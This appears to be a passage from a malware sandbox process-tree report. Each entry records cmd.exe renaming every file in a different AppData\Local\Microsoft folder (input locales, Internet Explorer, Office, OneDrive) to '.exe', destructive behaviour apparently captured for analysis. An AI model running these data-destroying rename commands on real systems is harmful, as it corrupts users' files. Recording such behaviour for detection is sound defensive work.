    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\nb-NO\*.*" "*.exe"
        5⤵
        
        PID:1944
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\nl-BE\*.*" "*.exe"
        5⤵
        
        PID:2136
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3484
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\nl-NL\*.*" "*.exe"
        5⤵
        
        PID:2168
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2788
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\pl-PL\*.*" "*.exe"
        5⤵
        
        PID:1620
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1704
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\pt-BR\*.*" "*.exe"
        5⤵
        
        PID:4512
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\pt-PT\*.*" "*.exe"
        5⤵
        
        PID:2716
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ro-MD\*.*" "*.exe"
        5⤵
        
        PID:1776
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2120
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ro-RO\*.*" "*.exe"
        5⤵
        
        PID:2192
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ru-RU\*.*" "*.exe"
        5⤵
        
        PID:4700
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3184
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sk-SK\*.*" "*.exe"
        5⤵
        
        PID:2268
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sl-SI\*.*" "*.exe"
        5⤵
        
        PID:1940
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sq-AL\*.*" "*.exe"
        5⤵
        
        PID:3608
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sr-Cyrl-BA\*.*" "*.exe"
        5⤵
        
        PID:2984
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sr-Cyrl-ME\*.*" "*.exe"
        5⤵
        
        PID:4760
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sr-Cyrl-RS\*.*" "*.exe"
        5⤵
        
        PID:1300
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sr-Latn-BA\*.*" "*.exe"
        5⤵
        
        PID:5076
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sr-Latn-ME\*.*" "*.exe"
        5⤵
        
        PID:2584
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1676
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sr-Latn-RS\*.*" "*.exe"
        5⤵
        
        PID:464
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sv-FI\*.*" "*.exe"
        5⤵
        
        PID:2072
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sv-SE\*.*" "*.exe"
        5⤵
        
        PID:1240
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\tr-TR\*.*" "*.exe"
        5⤵
        
        PID:1888
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4920
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\uk-UA\*.*" "*.exe"
        5⤵
        
        PID:2624
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3016
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\uz-Latn-UZ\*.*" "*.exe"
        5⤵
        
        PID:1616
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore\*.*" "*.exe"
        5⤵
        
        PID:3648
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\EmieSiteList\*.*" "*.exe"
        5⤵
        
        PID:3440
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\EmieUserList\*.*" "*.exe"
        5⤵
        
        PID:4632
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\IECompatData\*.*" "*.exe"
        5⤵
        
        PID:1636
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2396
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\*.*" "*.exe"
        5⤵
        
        PID:4508
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\*.*" "*.exe"
        5⤵
        
        PID:1652
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\TabRoaming\*.*" "*.exe"
        5⤵
        
        PID:2092
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tracking Protection\*.*" "*.exe"
        5⤵
        
        PID:560
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\7gbengd\*.*" "*.exe"
        5⤵
        
        PID:3884
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\s88mkmk\*.*" "*.exe"
        5⤵
        
        PID:2984
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\*.*" "*.exe"
        5⤵
        
        PID:4564
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\*.*" "*.exe"
        5⤵
        
        PID:4908
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Last Active\*.*" "*.exe"
        5⤵
        
        PID:1876
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\*.*" "*.exe"
        5⤵
        
        PID:2584
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\*.*" "*.exe"
        5⤵
        
        PID:464
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00004229\*.*" "*.exe"
        5⤵
        
        PID:2072
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\*.*" "*.exe"
        5⤵
        
        PID:2084
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\DLP\*.*" "*.exe"
        5⤵
        
        PID:3016
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\Licenses\*.*" "*.exe"
        5⤵
        
        PID:580
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\*.*" "*.exe"
        5⤵
        
        PID:1620
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\*.*" "*.exe"
        5⤵
        
        PID:4292
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\*.*" "*.exe"
        5⤵
        
        PID:3616
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\*.*" "*.exe"
        5⤵
        
        PID:3428
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\*.*" "*.exe"
        5⤵
        
        PID:4932
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\DLP\mip\*.*" "*.exe"
        5⤵
        
        PID:4152
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\DLP\mip\logs\*.*" "*.exe"
        5⤵
        
        PID:3388
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1940
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\Licenses\5\*.*" "*.exe"
        5⤵
        
        PID:3344
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\*.*" "*.exe"
        5⤵
        
        PID:3980
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\*.*" "*.exe"
        5⤵
        
        PID:2616
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\logs\*.*" "*.exe"
        5⤵
        
        PID:2836
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\setup\*.*" "*.exe"
        5⤵
        
        PID:2356
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4516
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\*.*" "*.exe"
        5⤵
        
        PID:1272
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\af\*.*" "*.exe"
        5⤵
        
        PID:2268
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\amd64\*.*" "*.exe"
        5⤵
        
        PID:4244
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\am-ET\*.*" "*.exe"
        5⤵
        
        PID:3608
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ar\*.*" "*.exe"
        5⤵
        
        PID:3096
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\arm64\*.*" "*.exe"
        5⤵
        
        PID:2796
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\as-IN\*.*" "*.exe"
        5⤵
        
        PID:4560
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4868
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\az-Latn-AZ\*.*" "*.exe"
        5⤵
        
        PID:4616
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\be\*.*" "*.exe"
        5⤵
        
        PID:540
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bg\*.*" "*.exe"
        5⤵
        
        PID:836
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bn-BD\*.*" "*.exe"
        5⤵
        
        PID:3508
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bn-IN\*.*" "*.exe"
        5⤵
        
        PID:1048
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bs-Latn-BA\*.*" "*.exe"
        5⤵
        
        PID:64
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ca\*.*" "*.exe"
        5⤵
        
        PID:2716
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ca-Es-VALENCIA\*.*" "*.exe"
        5⤵
        
        PID:2288
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\cs\*.*" "*.exe"
        5⤵
        
        PID:2220
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\cy-GB\*.*" "*.exe"
        5⤵
        
        PID:1540
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2116
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\da\*.*" "*.exe"
        5⤵
        
        PID:4988
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\de\*.*" "*.exe"
        5⤵
        
        PID:2192
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\el\*.*" "*.exe"
        5⤵
        
        PID:2944
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\en\*.*" "*.exe"
        5⤵
        
        PID:1796
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\en-GB\*.*" "*.exe"
        5⤵
        
        PID:3148
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\en-US\*.*" "*.exe"
        5⤵
        
        PID:4608
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\es\*.*" "*.exe"
        5⤵
        
        PID:3092
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\et\*.*" "*.exe"
        5⤵
        
        PID:872
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\eu\*.*" "*.exe"
        5⤵
        
        PID:4720
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fa\*.*" "*.exe"
        5⤵
        
        PID:4760
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fi\*.*" "*.exe"
        5⤵
        
        PID:2152
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fil-PH\*.*" "*.exe"
        5⤵
        
        PID:3804
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fr\*.*" "*.exe"
        5⤵
        
        PID:3980
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ga-IE\*.*" "*.exe"
        5⤵
        
        PID:4476
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\gd\*.*" "*.exe"
        5⤵
        
        PID:2124
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\gl\*.*" "*.exe"
        5⤵
        
        PID:4280
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2716
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\gu\*.*" "*.exe"
        5⤵
        
        PID:2616
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ha-Latn-NG\*.*" "*.exe"
        5⤵
        
        PID:116
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\he\*.*" "*.exe"
        5⤵
        
        PID:2892
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hi\*.*" "*.exe"
        5⤵
        
        PID:4932
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hr\*.*" "*.exe"
        5⤵
        
        PID:4748
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hu\*.*" "*.exe"
        5⤵
        
        PID:4508
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hy\*.*" "*.exe"
        5⤵
        
        PID:1292
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\id\*.*" "*.exe"
        5⤵
        
        PID:3172
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ig-NG\*.*" "*.exe"
        5⤵
        
        PID:3388
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\imageformats\*.*" "*.exe"
        5⤵
        
        PID:1472
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\images\*.*" "*.exe"
        5⤵
        
        PID:3676
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\IRMProtectors\*.*" "*.exe"
        5⤵
        
        PID:3996
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\is\*.*" "*.exe"
        5⤵
        
        PID:580
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\it\*.*" "*.exe"
        5⤵
        
        PID:1656
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ja\*.*" "*.exe"
        5⤵
        
        PID:4772
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ka\*.*" "*.exe"
        5⤵
        
        PID:2220
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\kk\*.*" "*.exe"
        5⤵
        
        PID:2348
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\km-KH\*.*" "*.exe"
        5⤵
        
        PID:1652
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\kn\*.*" "*.exe"
        5⤵
        
        PID:1820
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ko\*.*" "*.exe"
        5⤵
        
        PID:2944
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\kok\*.*" "*.exe"
        5⤵
        
        PID:4244
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ku-Arab\*.*" "*.exe"
        5⤵
        
        PID:3540
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ky\*.*" "*.exe"
        5⤵
        
        PID:1436
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\lb-LU\*.*" "*.exe"
        5⤵
        
        PID:4620
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\lt\*.*" "*.exe"
        5⤵
        
        PID:872
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\lv\*.*" "*.exe"
        5⤵
        
        PID:2960
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mi-NZ\*.*" "*.exe"
        5⤵
        
        PID:2928
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mk\*.*" "*.exe"
        5⤵
        
        PID:4304
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ml-IN\*.*" "*.exe"
        5⤵
        
        PID:5084
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1536
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mn\*.*" "*.exe"
        5⤵
        
        PID:3308
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mr\*.*" "*.exe"
        5⤵
        
        PID:1256
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ms\*.*" "*.exe"
        5⤵
        
        PID:3544
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mt-MT\*.*" "*.exe"
        5⤵
        
        PID:4132
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1656
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nb-NO\*.*" "*.exe"
        5⤵
        
        PID:2748
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ne-NP\*.*" "*.exe"
        5⤵
        
        PID:4988
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nl\*.*" "*.exe"
        5⤵
        
        PID:2900
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nn-NO\*.*" "*.exe"
        5⤵
        
        PID:116
